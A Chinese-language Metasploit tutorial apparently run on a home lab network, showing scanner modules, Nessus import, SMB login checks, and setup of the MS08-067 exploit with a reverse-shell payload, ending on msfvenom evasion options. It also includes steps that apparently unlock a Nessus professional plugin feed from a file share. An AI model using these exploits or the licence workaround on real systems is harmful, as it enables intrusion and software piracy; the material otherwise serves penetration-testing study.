192.168.0.106  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.106  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.106  1433  tcp    ms-sql-s         open   Microsoft SQL Server 2014 12.00.2269.00; RTM 
192.168.0.106  2383  tcp    ms-olap4         open
192.168.0.106  2869  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.0.106  3306  tcp    mysql            open   MariaDB unauthorized
192.168.0.106  5555  tcp    freeciv          open
192.168.0.106  8000  tcp    http-alt         open   WSGIServer/0.2 CPython/3.8.0
192.168.0.106  8009  tcp    ajp13            open   Apache Jserv Protocol v1.3
192.168.0.106  8080  tcp    http             open   Apache Tomcat/Coyote JSP engine 1.1
192.168.0.106  8100  tcp    http             open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
192.168.0.151  135   tcp    msrpc            open   Microsoft Windows RPC
192.168.0.151  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn
192.168.0.151  445   tcp    microsoft-ds     open
192.168.0.151  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP
192.168.0.151  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP
192.168.0.151  5357  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
使用Metasploit进行端口扫描

查询端口扫描器

代码语言:javascript复制
msf6 auxiliary(scanner/ip/ipidseq) > search portscan
Mathing Modules
================
#  NameDisclosure Date  RankCheck  Description
-  ----  ---------------  ---------  -----------
0 auxiliary/scanner/portscan/ftpbouncenormal  No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal  No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal  No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas  normal  No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack  normal  No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp  normal  No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal  No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal  No  Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/portscan/syn) > set threads 100
threads => 100
msf6 auxiliary(scanner/portscan/syn) > run
[ ]  TCP OPEN 192.168.0.155:135
[ ]  TCP OPEN 192.168.0.155:139
[ ]  TCP OPEN 192.168.0.155:445
…

速度很慢,135、139、445…端口打开

利用辅助模块

辅助模块
查看目录
代码语言:javascript复制
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
总用量 108
drwxr-xr-x 47 root root  4096  6月 24 17:25 admin
drwxr-xr-x  2 root root  4096  6月 24 20:36 analyze
drwxr-xr-x  2 root root  4096  6月 24 20:36 bnat
drwxr-xr-x  8 root root  4096  6月 24 17:25 client
drwxr-xr-x  4 root root  4096  6月 24 17:25 cloud
drwxr-xr-x  2 root root  4096  6月 24 20:36 crawler
drwxr-xr-x  2 root root  4096  6月 24 20:36 docx
drwxr-xr-x 27 root root  4096  6月 24 17:25 dos
-rwxr-xr-x  1 root root  1473  6月 16 23:59 example.py
-rw-r--r--  1 root root  1708  6月 16 23:59 example.rb
drwxr-xr-x  2 root root  4096  6月 24 20:36 fileformat
drwxr-xr-x 10 root root  4096  6月 24 17:25 fuzzers
drwxr-xr-x  2 root root 24576  6月 24 20:36 gather
drwxr-xr-x  2 root root  4096  6月 24 20:36 parser
drwxr-xr-x  3 root root  4096  6月 24 17:25 pdf
drwxr-xr-x 87 root root  4096  6月 24 17:25 scanner
drwxr-xr-x  4 root root  4096  6月 24 20:36 server
drwxr-xr-x  2 root root  4096  6月 24 20:36 sniffer
drwxr-xr-x  9 root root  4096  6月 24 17:25 spoof
drwxr-xr-x  5 root root  4096  6月 24 17:25 sqli
drwxr-xr-x  2 root root  4096  6月 24 20:36 voip
drwxr-xr-x  5 root root  4096  6月 24 17:25 vsploit
查看模块
代码语言:javascript复制
msf6 > show auxiliary
Auxiliary
=========
   #     Name                                                                     Disclosure Date  Rank    Check  Description
   -     ----        ---------------  ----    -----  -----------
0     auxiliary/admin/2wire/xslt_password_reset   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
1     auxiliary/admin/android/google_play_store_uxss_xframe_rce     normal  No     Android Browser RCE Through Google Play Store XFO
2     auxiliary/admin/appletv/appletv_display_image                normal  No     Apple TV Image Remote Control
3     auxiliary/admin/appletv/appletv_display_video                normal  No     Apple TV Video Remote Control
4     auxiliary/admin/atg/atg_client                             normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
5     auxiliary/admin/aws/aws_launch_instances                  normal  No     Launches Hosts in AWS
6     auxiliary/admin/backupexec/dump                         normal  No     Veritas Backup Exec Windows Remote File Access
7     auxiliary/admin/backupexec/registry                       normal  No     Veritas Backup Exec Server Registry Access
8     auxiliary/admin/chromecast/chromecast_reset               normal  No     Chromecast Factory Reset DoS
9     auxiliary/admin/chromecast/chromecast_youtube            normal  No     Chromecast YouTube Remote Control
10    auxiliary/admin/db2/db2rcmd       2004-03-04           normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
11    auxiliary/admin/dcerpc/cve_2020_1472_zerologon           normal  Yes    Netlogon Weak Cryptographic Authentication
…
使用辅助模块
代码语言:javascript复制
msf6> use scanner/http/webdav_scanner
案例:搜索不当的SQL Server
代码语言:javascript复制
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
PASSWORD          noThe password for the specified username
RHOSTS             yes   The target host(s), see https://github.com/
   rapid7/metasploit-framework/wiki/Using-Meta sploit
TDSENCRYPTION   false yes   Use TLS/SSL for TDS data "Force Encryption"
THREADS  1yes   The number of concurrent threads (max one p
   er host)
USERNAMEsanoThe username to authenticate as
USE_WINDOWS_AUTHENT  false  yes   Use windows authentification (requires DOMA
   IN option set)
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
协议扫描
SSH扫描
代码语言:javascript复制
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)
[ ] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
FTP扫描
代码语言:javascript复制
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)
[ ] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 betax0dx0a220-written by Tim Kosse (Tim.Kosse@gmx.de)x0dx0a220 Please visit http://sourceforge.net/projects/filezilla/x0dx0a'
[ ] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)x0dx0a'
[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)
[ ] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)x0dx0a'
[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous 
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.150
msf6 auxiliary(scanner/ftp/anonymous) > run
[ ] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
结论:192.168.0.161的FTP允许匿名登录
SNMP扫描
代码语言:javascript复制
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned  50 of 256 hosts (19% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
ARP 扫描
代码语言:javascript复制
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[ ] 192.168.0.1 appears to be up (UNKNOWN).
[ ] 192.168.0.106 appears to be up (UNKNOWN).
[ ] 192.168.0.150 appears to be up (VMware, Inc.).
[ ] 192.168.0.151 appears to be up (UNKNOWN).
[ ] 192.168.0.152 appears to be up (UNKNOWN).
[ ] 192.168.0.158 appears to be up (UNKNOWN).
[ ] 192.168.0.159 appears to be up (UNKNOWN).
[ ] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
HTTP服务扫描
代码语言:javascript复制
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[ ] 192.168.0.1:80
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  55 of 256 hosts (21% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[ ] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[ ] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
SMB扫描

SMB:SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。

SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统

代码语言:javascript复制
msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[ ] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

漏洞扫描

Nexpose
代码语言:javascript复制
# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
#chmod a x NeXposeSetup-Linux64.bin
#./NeXposeSetup-Linux64.bin
#cd /opt/rapid7/nexpose/nsc
#./nsc

https://127.0.0.1:3780/ 登录页面出来后就ok了。

Nessus

https://blog.csdn.net/qq_51577576/article/details/123211031

1)https://www.tenable.com/downloads/nessus

2)dpkg -i Nessus-10.2.0-debian9_amd64.deb

3)/bin/systemctl start nessusd.service

systemctl start nessusd.service

4)https://127.0.0.1:8834/

5)关闭服务:systemctl stop nessusd.service

代码语言:javascript复制
6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc
7)添加内容
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
8)

# cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/

9)更新
https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u
#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz

msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 >db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns
Hosts
=====
addresssvcs  vulns
-----------  -----
192.168.0.12 14
192.168.0.106  2376
192.168.0.150  6 46
192.168.0.151  4 28
192.168.0.155  3 2
192.168.0.157  4 29
192.168.0.158  1037

address:IP地址

svcs:探测到的服务数量

vulns:Nessus发现到的漏洞个数

展示所有漏洞

msf6 > vulns

专门漏洞扫描
验证SMB登录
代码语言:javascript复制
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456
smbupass => 123456
msf6 auxiliary(scanner/smb/smb_login) > ser verbose false
[-] Unknown command: ser
msf6 auxiliary(scanner/smb/smb_login) > run
扫描开放的VNC空口令

VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。

代码语言:javascript复制
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
扫描开放的X11服务器

X11也叫做X Window系统,X Window系统 (X11或X)是一种位图显示的视窗系统。它是在 Unix 和类Unix 操作系统,以及 OpenVMS 上建立图形用户界面的标准工具包和协议,并可用于几乎所有已有的现代操作系统。

代码语言:javascript复制
msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000- 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

开启渗透之旅

msf6常用命令

msf6 >show exploits 显示所有的攻击模块

代码语言:javascript复制
msf6 > show exploits
Exploits
========
# Name  Disclosure Date  Rank   Check  Description
- ---- ---------------  ----   -----  -----------
0 exploit/aix/local/ibstat_path  2013-09-24   excellent  Yesibstat $PATH Privilege Escalation
1 exploit/aix/local/xorg_x11_server 2018-10-25   great  YesXorg X11 Server Local Privilege Escalation
2 exploit/aix/rpc_cmsd_opcode21  2009-10-07   great  No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
3 exploit/aix/rpc_ttdbserverd_realpath   2009-06-17   great  No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
4 exploit/android/adb/adb_server_exec   2016-01-01   excellent  YesAndroid ADB Debug Server Remote Payload Execution
5 exploit/android/browser/samsung_knox_smdm_url   2014-11-12   excellent  No Samsung Galaxy KNOX Android Browser RCE
6 exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13   normal No Android Stagefright MP4 tx3g Integer Overflow
…

代码语言:javascript复制
msf6 > show auxiliary
Auxiliary
=========
   # Name Disclosure Date  RankCheck  Description
   - ---- ---------------  ---------  -----------
0 auxiliary/admin/2wire/xslt_password_reset   2007-08-15normal  No 2Wire Cross-Site Request Forgery Password Reset Vulnerability
1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal  No Android Browser RCE Through Google Play Store XFO
2 auxiliary/admin/appletv/appletv_display_image normal  No Apple TV Image Remote Control
3 auxiliary/admin/appletv/appletv_display_video normal  No Apple TV Video Remote Control
4 auxiliary/admin/atg/atg_clientnormal  No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
…

代码语言:javascript复制
msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 >search mysql

代码语言:javascript复制
msf6 > search ms08_067
Matching Modules
================
#  Name Disclosure Date  Rank   Check  Description
-  ---- ---------------  ----   -----  -----------
0  exploit/windows/smb/ms08_067_netapi  2008-10-28   great  YesMS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi 
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting  Required  Description
---- ---------------  --------  -----------
RHOSTSyes   The target host(s), see https://github.com/rapid7/metas
   ploit-framework/wiki/Using-Metasploit
RPORT445  yes   The SMB service port (TCP)
SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.0.150yes   The listen address (an interface may be specified)
LPORT 4444 yes   The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf>show payloads

显示某个模块下的payload

代码语言:javascript复制
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

使用某个payload

代码语言:javascript复制
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf>show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   …
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)

显示更详细的show targets内容

代码语言:javascript复制
msf6 exploit(windows/smb/ms08_067_netapi) > info
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm
Brett Moore brett.moore@insomniasec.com
frank2
jduck
Available targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   …
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)
Check supported:
  Yes
Basic options:
  Name Current Setting  Required  Description
  ---- ---------------  --------  -----------
  RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT445  yes   The SMB service port (TCP)
  SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload information:
  Space: 408
  Avoid: 8 characters
Description:
  This module exploits a parsing flaw in the path canonicalization   code of NetAPI32.dll through the Server Service. This module is   capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along   with a dozen others in the same process) from crashing. Windows XP   targets seem to handle multiple successful exploitation events, but   2003 targets will often crash or hang on subsequent attempts. This   is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
代码语言:javascript复制
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT445  yes   The SMB service port (TCP)
   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 192.168.0.105yes   The listen address (an interface may be specified)
   LPORT 4444 yes   The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name Current Setting  Required  Description
   ---- ---------------  --------  -----------
   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT445  yes   The SMB service port (TCP)
   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)
   LHOST  yes   The listen address (an interface may be specified)
   LPORT 4444 yes   The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

设置所有模块的lhost

代码语言:javascript复制
msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150
lhost => 102.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost

免杀技术

msfvenom

Options:

-l, --list

<type>

列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式等

-p, --payload

<payload>

要使用的有效负载(-list payloads to list,-list options for arguments)。为自定义指定“-”或STDIN

--list-options

列表——有效载荷的标准、高级和规避选项

-f, --format

<format>

输出格式(使用--列出要列出的格式)

-e, --encoder

<encoder>

